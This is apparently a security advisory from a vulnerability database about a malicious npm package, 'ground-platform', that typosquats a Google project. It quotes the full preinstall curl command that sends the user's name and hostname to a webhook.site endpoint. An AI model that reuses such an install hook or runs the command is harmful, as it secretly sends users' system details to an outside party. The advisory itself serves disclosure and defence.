VDB
GCVE-110-OSM-2026-1170
GCVE-110-OSM-2026-1170
Advisory PublishedCVSS 5.4/10
Exfiltrates username and hostname to attacker-controlled webhook.site endpoint via curl GET in preinstall hook. Typosquats the legitimate Google open-source project google/ground-platform.
package.json preinstall executes: `curl -G https://webhook.site/8ea579e4-2112-46c7-a249-0bcfd147476f --data-urlencode "user=$(whoami)" --data-urlencode "host=$(hostname)"`. No JS runtime required — pure shell execution. Exfil fires before npm install completes. Package also embeds duplicate malicious package.json in nested google/ and google2/ subdirectories with identical payload.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
5.4/10
Medium · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | ground-platform | 9.0.0 (affected) | — |
Browse GCVE Records
74,267 records in the GCVE database · Updated July 22, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.